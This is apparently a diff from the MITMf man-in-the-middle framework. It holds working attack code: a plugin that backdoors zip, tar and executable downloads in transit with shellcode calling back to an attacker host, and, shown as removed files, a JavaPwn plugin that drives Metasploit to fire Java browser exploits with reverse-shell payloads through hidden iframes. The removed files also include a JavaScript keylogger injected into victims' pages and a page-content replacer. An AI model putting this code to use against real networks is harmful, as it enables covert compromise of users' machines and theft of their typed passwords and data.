            elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
                targetFile = machobin.machobin(FILE=binaryFile,
                                               OUTPUT=os.path.basename(binaryFile),
                                               SHELL=self.MachoIntelx64['SHELL'],
                                               HOST=self.MachoIntelx64['HOST'],
                                               PORT=int(self.MachoIntelx64['PORT']),
                                               SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
                                               FAT_PRIORITY=self.FatPriority
                                               )
                result = targetFile.run_this()

        # result may still be None (unsupported/ignored type); caller decides
        self.patched.put(result)
        return

    except Exception as e:
        print 'Exception', str(e)
        mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e))
        return None
|
||||
|
||||
def tar_files(self, aTarFileBytes, formatt):
    """Unpack a tar archive, backdoor eligible member files, and repack it.

    Args:
        aTarFileBytes: raw bytes of the tar archive intercepted from the proxy.
        formatt: compression hint ('gz', 'bz', or anything else for plain tar).

    The result (patched or original bytes) is delivered via ``self.patched``
    (a queue) rather than returned, because this runs in a child process
    spawned by handleResponse.
    """

    print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'

    # Refuse to process archives above the configured size cap; pass the
    # original bytes through untouched.
    if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
        print "[!] TarFile over allowed size"
        mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes)))
        self.patched.put(aTarFileBytes)
        return

    # tarfile needs a real file object / path, so spool the bytes to a
    # temporary file first.
    with tempfile.NamedTemporaryFile() as tarFileStorage:
        tarFileStorage.write(aTarFileBytes)
        tarFileStorage.flush()

        if not tarfile.is_tarfile(tarFileStorage.name):
            print '[!] Not a tar file'
            self.patched.put(aTarFileBytes)
            return

        # Map the caller's format hint onto tarfile's mode suffix.
        compressionMode = ':'
        if formatt == 'gz':
            compressionMode = ':gz'
        if formatt == 'bz':
            compressionMode = ':bz2'

        tarFile = None
        try:
            tarFileStorage.seek(0)
            tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
        except tarfile.ReadError:
            # Fall through: tarFile stays None and we forward the original.
            pass

        if tarFile is None:
            print '[!] Not a tar file'
            self.patched.put(aTarFileBytes)
            return

        print '[*] Tar file contents and info:'
        print '[*] Compression:', formatt

        members = tarFile.getmembers()
        for info in members:
            print "\t", info.name, info.mtime, info.size

        # Build the replacement archive with the same compression mode.
        newTarFileStorage = tempfile.NamedTemporaryFile()
        newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)

        patchCount = 0
        wasPatched = False

        for info in members:
            print "[*] >>> Next file in tarfile:", info.name

            # Non-regular members (dirs, links, ...) are copied through as-is.
            if not info.isfile():
                print info.name, 'is not a file'
                newTarFile.addfile(info, tarFile.extractfile(info))
                continue

            # Oversized members are copied through unpatched.
            if info.size >= long(self.FileSizeMax):
                print info.name, 'is too big'
                newTarFile.addfile(info, tarFile.extractfile(info))
                continue

            # Check against keywords
            # self.tarblacklist may be a single string or a list of strings;
            # a substring match on the member name triggers the blacklist.
            keywordCheck = False

            if type(self.tarblacklist) is str:
                if self.tarblacklist.lower() in info.name.lower():
                    keywordCheck = True

            else:
                for keyword in self.tarblacklist:
                    if keyword.lower() in info.name.lower():
                        keywordCheck = True
                        continue

            # NOTE(review): a blacklisted member is skipped entirely, i.e. it
            # is NOT added to the rebuilt archive — the file is dropped from
            # the output tar. Confirm this is intended behavior.
            if keywordCheck is True:
                print "[!] Tar blacklist enforced!"
                mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name))
                continue

            # Try to patch
            extractedFile = tarFile.extractfile(info)

            # Past the patch budget, remaining members are copied unmodified.
            if patchCount >= int(self.userConfig['TAR']['patchCount']):
                newTarFile.addfile(info, extractedFile)
            else:
                # create the file on disk temporarily for fileGrinder to run on it
                with tempfile.NamedTemporaryFile() as tmp:
                    shutil.copyfileobj(extractedFile, tmp)
                    tmp.flush()
                    patchResult = self.binaryGrinder(tmp.name)
                    if patchResult:
                        patchCount += 1
                        # binaryGrinder writes its output under backdoored/
                        # using the temp file's basename.
                        file2 = "backdoored/" + os.path.basename(tmp.name)
                        print "[*] Patching complete, adding to tar file."
                        # The header must advertise the patched file's size or
                        # the resulting archive would be corrupt.
                        info.size = os.stat(file2).st_size
                        with open(file2, 'rb') as f:
                            newTarFile.addfile(info, f)
                        mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name))
                        os.remove(file2)
                        wasPatched = True
                    else:
                        print "[!] Patching failed"
                        with open(tmp.name, 'rb') as f:
                            newTarFile.addfile(info, f)
                        mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name))

            if patchCount == int(self.userConfig['TAR']['patchCount']):
                mitmf_logger.info("Met Tar config patchCount limit.")

        # finalize the writing of the tar file first
        newTarFile.close()

        # then read the new tar file into memory
        newTarFileStorage.seek(0)
        ret = newTarFileStorage.read()
        newTarFileStorage.close()  # it's automatically deleted

        if wasPatched is False:
            # If nothing was changed return the original
            print "[*] No files were patched forwarding original file"
            self.patched.put(aTarFileBytes)
            return
        else:
            self.patched.put(ret)
            return
|
||||
|
||||
def zip_files(self, aZipFile):
    """Unpack a zip archive, backdoor eligible member files, and repack it.

    Args:
        aZipFile: raw bytes of the zip archive intercepted from the proxy.

    The result (patched or original bytes) is delivered via ``self.patched``
    (a queue) because this runs in a child process spawned by handleResponse.
    """

    print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'

    # Refuse to process archives above the configured size cap; forward the
    # original bytes untouched.
    if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
        print "[!] ZipFile over allowed size"
        mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile)))
        self.patched.put(aZipFile)
        return

    # Work under /tmp with a random 8-char name for both the extraction
    # directory and the on-disk copy of the archive.
    tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
    tmpDir = '/tmp/' + tmpRan
    tmpFile = '/tmp/' + tmpRan + '.zip'

    os.mkdir(tmpDir)

    with open(tmpFile, 'w') as f:
        f.write(aZipFile)

    zippyfile = zipfile.ZipFile(tmpFile, 'r')

    #encryption test
    try:
        zippyfile.testzip()

    except RuntimeError as e:
        # zipfile raises RuntimeError mentioning 'encrypted' for
        # password-protected archives — those cannot be patched.
        # NOTE(review): this path returns the bytes directly instead of
        # putting them on self.patched like every other exit — the parent
        # process would block on the queue. Verify against the caller.
        if 'encrypted' in str(e):
            mitmf_logger.info('Encrypted zipfile found. Not patching.')
            return aZipFile

    print "[*] ZipFile contents and info:"

    for info in zippyfile.infolist():
        print "\t", info.filename, info.date_time, info.file_size

    zippyfile.extractall(tmpDir)

    patchCount = 0

    wasPatched = False

    for info in zippyfile.infolist():
        print "[*] >>> Next file in zipfile:", info.filename

        # Directories need no patching; they are re-created by os.walk below.
        if os.path.isdir(tmpDir + '/' + info.filename) is True:
            print info.filename, 'is a directory'
            continue

        #Check against keywords
        # self.zipblacklist may be a single string or a list of strings; a
        # substring match on the member name triggers the blacklist.
        keywordCheck = False

        if type(self.zipblacklist) is str:
            if self.zipblacklist.lower() in info.filename.lower():
                keywordCheck = True

        else:
            for keyword in self.zipblacklist:
                if keyword.lower() in info.filename.lower():
                    keywordCheck = True
                    continue

        # Blacklisted members are left as extracted (unpatched); they are
        # still re-added to the archive by the os.walk pass below.
        if keywordCheck is True:
            print "[!] Zip blacklist enforced!"
            mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename))
            continue

        # binaryGrinder reads the extracted file and, on success, writes the
        # patched copy under backdoored/ using the file's basename.
        patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)

        if patchResult:
            patchCount += 1
            file2 = "backdoored/" + os.path.basename(info.filename)
            print "[*] Patching complete, adding to zip file."
            # Overwrite the extracted original with the patched binary.
            shutil.copyfile(file2, tmpDir + '/' + info.filename)
            mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename))
            os.remove(file2)
            wasPatched = True
        else:
            print "[!] Patching failed"
            mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename))

        print '-' * 10

        # Stop patching once the configured budget is reached; remaining
        # members stay unmodified.
        if patchCount >= int(self.userConfig['ZIP']['patchCount']):  # Make this a setting.
            mitmf_logger.info("Met Zip config patchCount limit.")
            break

    zippyfile.close()

    # Rebuild the archive from the (possibly modified) extraction tree.
    zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)

    print "[*] Writing to zipfile:", tmpFile

    for base, dirs, files in os.walk(tmpDir):
        for afile in files:
            filename = os.path.join(base, afile)
            print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
            # arcname strips the temp-dir prefix so paths inside the archive
            # match the original layout.
            zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))

    zipResult.close()
    #clean up
    shutil.rmtree(tmpDir)

    with open(tmpFile, 'rb') as f:
        tempZipFile = f.read()
    os.remove(tmpFile)

    if wasPatched is False:
        print "[*] No files were patched forwarding original file"
        self.patched.put(aZipFile)
        return
    else:
        self.patched.put(tempZipFile)
        return
|
||||
|
||||
def handleResponse(self, request, data):
    """Proxy hook: inspect a response body and, when it is a supported
    archive or binary, patch it in a child process before forwarding.

    Args:
        request: the proxied request object (twisted-style; provides
            ``client.headers`` and ``client.getClientIP()``).
        data: the raw response body bytes.

    Returns:
        dict with 'request' and 'data' keys — 'data' is the (possibly
        backdoored) body to forward to the client.
    """

    content_header = request.client.headers['Content-Type']
    client_ip = request.client.getClientIP()

    if content_header in self.zipMimeTypes:

        if self.bytes_have_format(data, 'zip'):
            mitmf_logger.info("{} Detected supported zip file type!".format(client_ip))

            # BUG FIX: the original targeted self.zip, but the patcher
            # method defined in this class is zip_files — self.zip would
            # raise AttributeError when the child process started.
            process = multiprocessing.Process(name='zip', target=self.zip_files, args=(data,))
            process.daemon = True
            process.start()
            process.join()
            # The child delivers its result via the self.patched queue.
            bd_zip = self.patched.get()

            if bd_zip:
                mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
                return {'request': request, 'data': bd_zip}

        else:
            for tartype in ['gz', 'bz', 'tar']:
                if self.bytes_have_format(data, tartype):
                    mitmf_logger.info("{} Detected supported tar file type!".format(client_ip))

                    process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
                    process.daemon = True
                    process.start()
                    process.join()
                    bd_tar = self.patched.get()

                    if bd_tar:
                        mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
                        return {'request': request, 'data': bd_tar}

    elif content_header in self.binaryMimeTypes:
        for bintype in ['pe', 'elf', 'fatfile', 'machox64', 'machox86']:
            if self.bytes_have_format(data, bintype):
                mitmf_logger.info("{} Detected supported binary type!".format(client_ip))
                fd, tmpFile = mkstemp()
                # BUG FIX: close the descriptor returned by mkstemp (it was
                # leaked) and write the payload in binary mode — text mode
                # can corrupt binary data.
                os.close(fd)
                with open(tmpFile, 'wb') as f:
                    f.write(data)

                process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
                process.daemon = True
                process.start()
                process.join()
                patchb = self.patched.get()

                if patchb:
                    # BUG FIX: read via a context manager so the file handle
                    # is not leaked.
                    with open("backdoored/" + os.path.basename(tmpFile), "rb") as f:
                        bd_binary = f.read()
                    os.remove('./backdoored/' + os.path.basename(tmpFile))
                    mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
                    return {'request': request, 'data': bd_binary}

    else:
        mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header))

    # Fall through: unsupported or unpatched content is forwarded unchanged.
    return {'request': request, 'data': data}
|
|
@ -24,15 +24,10 @@ import re
|
|||
import sys
|
||||
import argparse
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import get_if_addr
|
||||
|
||||
from core.utils import SystemConfig
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.CacheKill import CacheKill
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class Inject(CacheKill, Plugin):
|
||||
name = "Inject"
|
||||
optname = "inject"
|
||||
|
|
|
@ -1,235 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import string
|
||||
import random
|
||||
import threading
|
||||
import sys
|
||||
import logging
|
||||
|
||||
from core.msfrpc import Msfrpc
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.BrowserProfiler import BrowserProfiler
|
||||
from time import sleep
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import get_if_addr
|
||||
|
||||
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
|
||||
requests_log.setLevel(logging.WARNING)
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class JavaPwn(BrowserProfiler, Plugin):
    """MITMf plugin: drive-by exploitation of outdated Java browser plugins.

    Builds on BrowserProfiler (which fingerprints clients and exposes the
    result in self.dic_output) and drives Metasploit over MSGRPC to select,
    launch and deliver a matching Java exploit via an injected iframe.
    """
    name = "JavaPwn"
    optname = "javapwn"
    desc = "Performs drive-by attacks on clients with out-of-date java browser plugins"
    tree_output = []
    depends = ["Browserprofiler"]
    version = "0.3"
    has_opts = False

    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
        self.msfip = options.ip_address
        self.sploited_ips = []  #store ip of pwned or not vulnerable clients so we don't re-exploit

        try:
            msfcfg = options.configfile['MITMf']['Metasploit']
        except Exception, e:
            sys.exit("[-] Error parsing Metasploit options in config file : " + str(e))

        try:
            self.javacfg = options.configfile['JavaPwn']
        except Exception, e:
            sys.exit("[-] Error parsing config for JavaPwn: " + str(e))

        self.msfport = msfcfg['msfport']
        self.rpcip = msfcfg['rpcip']
        self.rpcpass = msfcfg['rpcpass']

        #Initialize the BrowserProfiler plugin
        BrowserProfiler.initialize(self, options)
        self.black_ips = []

        # Connect to the Metasploit MSGRPC server up-front so a
        # misconfiguration aborts the plugin instead of failing later.
        try:
            msf = Msfrpc({"host": self.rpcip})  #create an instance of msfrpc libarary
            msf.login('msf', self.rpcpass)
            version = msf.call('core.version')['version']
            self.tree_output.append("Connected to Metasploit v%s" % version)
        except Exception:
            sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")

        # The exploitation loop runs on a daemon thread so it dies with MITMf.
        t = threading.Thread(name='pwn', target=self.pwn, args=(msf,))
        t.setDaemon(True)
        t.start()  #start the main thread

    def rand_url(self):  #generates a random url for our exploits (urls are generated with a / at the beginning)
        return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5))

    def get_exploit(self, java_version):
        """Return the exploit names from the JavaPwn config that match the
        client's Java version string (e.g. '1.7.0.25').

        Config values under ['Multi'] map exploit name -> version string or
        list of version strings; a leading '*' in a configured version means
        "this exact update only", otherwise any update <= the configured one
        matches.
        """
        exploits = []

        # Split '1.7.0.25' into base version '1.7.0' and update number 25.
        client_vstring = java_version[:-len(java_version.split('.')[3])-1]
        client_uversion = int(java_version.split('.')[3])

        for ver in self.javacfg['Multi'].iteritems():
            if type(ver[1]) is list:
                for list_vers in ver[1]:

                    version_string = list_vers[:-len(list_vers.split('.')[3])-1]
                    update_version = int(list_vers.split('.')[3])

                    # '*' prefix: only this exact update number is vulnerable.
                    if ('*' in version_string[:1]) and (client_vstring == version_string[1:]):
                        if client_uversion == update_version:
                            exploits.append(ver[0])
                    # No prefix: vulnerable up to and including this update.
                    elif (client_vstring == version_string):
                        if client_uversion <= update_version:
                            exploits.append(ver[0])
            else:
                version_string = ver[1][:-len(ver[1].split('.')[3])-1]
                update_version = int(ver[1].split('.')[3])

                if ('*' in version_string[:1]) and (client_vstring == version_string[1:]):
                    if client_uversion == update_version:
                        exploits.append(ver[0])
                elif client_vstring == version_string:
                    if client_uversion <= update_version:
                        exploits.append(ver[0])

        return exploits


    def injectWait(self, msfinstance, url, client_ip):  #here we inject an iframe to trigger the exploit and check for resulting sessions
        #inject iframe
        mitmf_logger.info("%s >> now injecting iframe to trigger exploit" % client_ip)
        self.html_payload = "<iframe src='http://%s:%s%s' height=0%% width=0%%></iframe>" % (self.msfip, self.msfport, url)  #temporarily changes the code that the Browserprofiler plugin injects

        mitmf_logger.info('%s >> waiting for ze shellz, Please wait...' % client_ip)

        exit = False
        i = 1
        while i <= 30:  #wait max 60 seconds for a new shell
            if exit:
                break
            shell = msfinstance.call('session.list')  #poll metasploit every 2 seconds for new sessions
            if len(shell) > 0:
                for k, v in shell.iteritems():
                    if client_ip in shell[k]['tunnel_peer']:  #make sure the shell actually came from the ip that we targeted
                        mitmf_logger.info("%s >> Got shell!" % client_ip)
                        self.sploited_ips.append(client_ip)  #target successfuly exploited :)
                        self.black_ips = self.sploited_ips  #Add to inject blacklist since box has been popped
                        exit = True
                        break
            sleep(2)
            i += 1

        if exit is False:  #We didn't get a shell :(
            mitmf_logger.info("%s >> session not established after 30 seconds" % client_ip)

        self.html_payload = self.get_payload()  # restart the BrowserProfiler plugin

    def send_command(self, cmd, msf, vic_ip):
        """Run a newline-separated msfconsole command string on a fresh
        virtual console via MSGRPC. Errors are logged, not raised."""
        try:
            mitmf_logger.info("%s >> sending commands to metasploit" % vic_ip)

            #Create a virtual console
            console_id = msf.call('console.create')['id']

            #write the cmd to the newly created console
            msf.call('console.write', [console_id, cmd])

            mitmf_logger.info("%s >> commands sent succesfully" % vic_ip)
        except Exception, e:
            mitmf_logger.info('%s >> Error accured while interacting with metasploit: %s:%s' % (vic_ip, Exception, e))

    def pwn(self, msf):
        """Main exploitation loop (runs on the daemon thread started by
        initialize); polls the BrowserProfiler output for new Java-enabled
        clients and fires matching exploits."""
        while True:
            if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1':  #only choose clients that we are 100% sure have the java plugin installed and enabled

                brwprofile = self.dic_output  #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format

                if brwprofile['ip'] not in self.sploited_ips:  #continue only if the ip has not been already exploited

                    vic_ip = brwprofile['ip']

                    mitmf_logger.info("%s >> client has java version %s installed! Proceeding..." % (vic_ip, brwprofile['java_version']))
                    mitmf_logger.info("%s >> Choosing exploit based on version string" % vic_ip)

                    exploits = self.get_exploit(brwprofile['java_version'])  # get correct exploit strings defined in javapwn.cfg

                    if exploits:

                        if len(exploits) > 1:
                            mitmf_logger.info("%s >> client is vulnerable to %s exploits!" % (vic_ip, len(exploits)))
                            exploit = random.choice(exploits)
                            mitmf_logger.info("%s >> choosing %s" % (vic_ip, exploit))
                        else:
                            mitmf_logger.info("%s >> client is vulnerable to %s!" % (vic_ip, exploits[0]))
                            exploit = exploits[0]

                        #here we check to see if we already set up the exploit to avoid creating new jobs for no reason
                        jobs = msf.call('job.list')  #get running jobs
                        if len(jobs) > 0:
                            for k, v in jobs.iteritems():
                                info = msf.call('job.info', [k])
                                if exploit in info['name']:
                                    mitmf_logger.info('%s >> %s already started' % (vic_ip, exploit))
                                    url = info['uripath']  #get the url assigned to the exploit
                                    self.injectWait(msf, url, vic_ip)

                        else:  #here we setup the exploit
                            rand_port = random.randint(1000, 65535)  #generate a random port for the payload listener
                            rand_url = self.rand_url()
                            #generate the command string to send to the virtual console
                            #new line character very important as it simulates a user pressing enter
                            cmd = "use exploit/%s\n" % exploit
                            cmd += "set SRVPORT %s\n" % self.msfport
                            cmd += "set URIPATH %s\n" % rand_url
                            cmd += "set PAYLOAD generic/shell_reverse_tcp\n"  #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform
                            cmd += "set LHOST %s\n" % self.msfip
                            cmd += "set LPORT %s\n" % rand_port
                            cmd += "exploit -j\n"

                            mitmf_logger.debug("command string:\n%s" % cmd)

                            self.send_command(cmd, msf, vic_ip)

                            self.injectWait(msf, rand_url, vic_ip)
                    else:
                        #this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert)
                        mitmf_logger.info("%s >> client is not vulnerable to any java exploit" % vic_ip)
                        mitmf_logger.info("%s >> falling back to the signed applet attack" % vic_ip)

                        rand_url = self.rand_url()
                        rand_port = random.randint(1000, 65535)

                        cmd = "use exploit/multi/browser/java_signed_applet\n"
                        cmd += "set SRVPORT %s\n" % self.msfport
                        cmd += "set URIPATH %s\n" % rand_url
                        cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
                        cmd += "set LHOST %s\n" % self.msfip
                        cmd += "set LPORT %s\n" % rand_port
                        cmd += "exploit -j\n"

                        self.send_command(cmd, msf, vic_ip)
                        self.injectWait(msf, rand_url, vic_ip)
            sleep(1)
|
|
@ -1,169 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.Inject import Inject
|
||||
import logging
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class jskeylogger(Inject, Plugin):
    """MITMf plugin: injects a JavaScript keylogger (adapted from the
    Metasploit http_javascript_keylogger module) into proxied pages and
    decodes the keystrokes POSTed back to the '/keylog' endpoint."""
    name = "Javascript Keylogger"
    optname = "jskeylogger"
    desc = "Injects a javascript keylogger into clients webpages"
    implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"]
    depends = ["Inject"]
    version = "0.2"
    has_opts = False

    def initialize(self, options):
        # Let the Inject plugin handle the actual HTML injection; we only
        # supply the payload it injects.
        Inject.initialize(self, options)
        self.html_payload = self.msf_keylogger()

    def sendPostData(self, request):
        """Decode and log keystroke POSTs produced by the injected JS.

        The payload POSTs bodies of the form ',<hex>,<hex>,...&&<field name>'
        to a URI containing 'keylog'.
        """
        #Handle the plugin output
        if 'keylog' in request.uri:

            raw_keys = request.postData.split("&&")[0]
            keys = raw_keys.split(",")
            # The key list starts and ends with empty strings from the
            # leading/trailing commas — drop both.
            del keys[0]; del(keys[len(keys)-1])

            input_field = request.postData.split("&&")[1]

            nice = ''
            for n in keys:
                if n == '9':
                    # TAB keycode
                    nice += "<TAB>"
                elif n == '8':
                    # Backspace keycode: remove the last decoded character
                    nice = nice.replace(nice[-1:], "")
                elif n == '13':
                    # Enter keycode: the JS resets its buffer, so reset ours
                    nice = ''
                else:
                    try:
                        # Everything else arrives hex-encoded
                        nice += n.decode('hex')
                    except:
                        mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))

            #try:
            #   input_field = input_field.decode('hex')
            #except:
            #   mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))

            mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))

    def msf_keylogger(self):
        """Return the JavaScript keylogger payload to inject.

        Stolen from the Metasploit module http_javascript_keylogger: hooks
        keydown/keypress on the document and POSTs accumulated keycodes plus
        the focused input's name back to the 'keylog' URI via XHR.
        """

        payload = """<script type="text/javascript">
window.onload = function mainfunc(){
var2 = ",";
name = '';
function make_xhr(){
var xhr;
try {
xhr = new XMLHttpRequest();
} catch(e) {
try {
xhr = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xhr) {
throw "failed to create XMLHttpRequest";
}
return xhr;
}

xhr = make_xhr();
xhr.onreadystatechange = function() {
if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
eval(xhr.responseText);
}
}

if (window.addEventListener) {
document.addEventListener('keypress', function2, true);
document.addEventListener('keydown', function1, true);
} else if (window.attachEvent) {
document.attachEvent('onkeypress', function2);
document.attachEvent('onkeydown', function1);
} else {
document.onkeypress = function2;
document.onkeydown = function1;
}

}

function function2(e)
{
srcname = window.event.srcElement.name;
var3 = (window.event) ? window.event.keyCode : e.which;
var3 = var3.toString(16);

if (var3 != "d")
{
andxhr(var3, srcname);
}
}

function function1(e)
{
srcname = window.event.srcElement.name;
id = window.event.srcElement.id;

var3 = (window.event) ? window.event.keyCode : e.which;
if (var3 == 9 || var3 == 8 || var3 == 13)
{
andxhr(var3, srcname);
}
else if (var3 == 0)
{

text = document.getElementById(id).value;
if (text.length != 0)
{
andxhr(text.toString(16), srcname);
}
}
}

function andxhr(key, inputName)
{
if (inputName != name)
{
name = inputName;
var2 = ",";
}

var2= var2 + key + ",";

xhr.open("POST", "keylog", true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xhr.send(var2 + '&&' + inputName);

if (key == 13 || var2.length > 3000)
{
var2 = ",";
}
}
</script>"""

        return payload
|
|
@ -1,105 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
"""
|
||||
Plugin by @rubenthijssen
|
||||
"""
|
||||
|
||||
import sys
|
||||
import logging
|
||||
import time
|
||||
import re
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.CacheKill import CacheKill
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class Replace(CacheKill, Plugin):
    """MITMf plugin: replaces arbitrary content in proxied HTML responses,
    either via a single search/replace string pair or a file of
    tab-separated regex pairs. Inherits CacheKill so replaced responses are
    not masked by client/server caching (unless --keep-cache is set)."""
    name = "Replace"
    optname = "replace"
    desc = "Replace arbitrary content in HTML content"
    implements = ["handleResponse", "handleHeader", "connectionMade"]
    depends = ["CacheKill"]
    version = "0.1"
    has_opts = True

    def initialize(self, options):
        self.options = options

        self.search_str = options.search_str
        self.replace_str = options.replace_str
        self.regex_file = options.regex_file

        # At least one replacement source must be provided.
        if (self.search_str is None or self.search_str == "") and self.regex_file is None:
            sys.exit("[-] Please provide a search string or a regex file")

        # Each line of the regex file is '<pattern>\t<replacement>'.
        self.regexes = []
        if self.regex_file is not None:
            for line in self.regex_file:
                self.regexes.append(line.strip().split("\t"))

        # With --keep-cache, skip the CacheKill hooks so caching headers are
        # left untouched.
        if self.options.keep_cache:
            self.implements.remove("handleHeader")
            self.implements.remove("connectionMade")

        # ctable: last-replacement timestamp per client IP;
        # dtable: per (ip + hostname) flag that a replacement happened.
        self.ctable = {}
        self.dtable = {}
        self.mime = "text/html"

    def handleResponse(self, request, data):
        """Apply the configured replacements to HTML responses and return
        the modified body; non-HTML responses fall through unchanged."""
        ip, hn, mime = self._get_req_info(request)

        if self._should_replace(ip, hn, mime):

            if self.search_str is not None and self.search_str != "":
                data = data.replace(self.search_str, self.replace_str)
                mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str))

            # Did the user provide us with a regex file?
            for regex in self.regexes:
                try:
                    data = re.sub(regex[0], regex[1], data)

                    mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
                except Exception:
                    logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))

            self.ctable[ip] = time.time()
            self.dtable[ip+hn] = True

            return {'request': request, 'data': data}

        return

    def add_options(self, options):
        options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)")
        options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.")
        options.add_argument("--regex-file", type=file, help="Load file with regexes. File format: <regex1>[tab]<regex2>[new-line]")
        options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.")

    def _should_replace(self, ip, hn, mime):
        # Only act on responses whose Content-Type contains text/html.
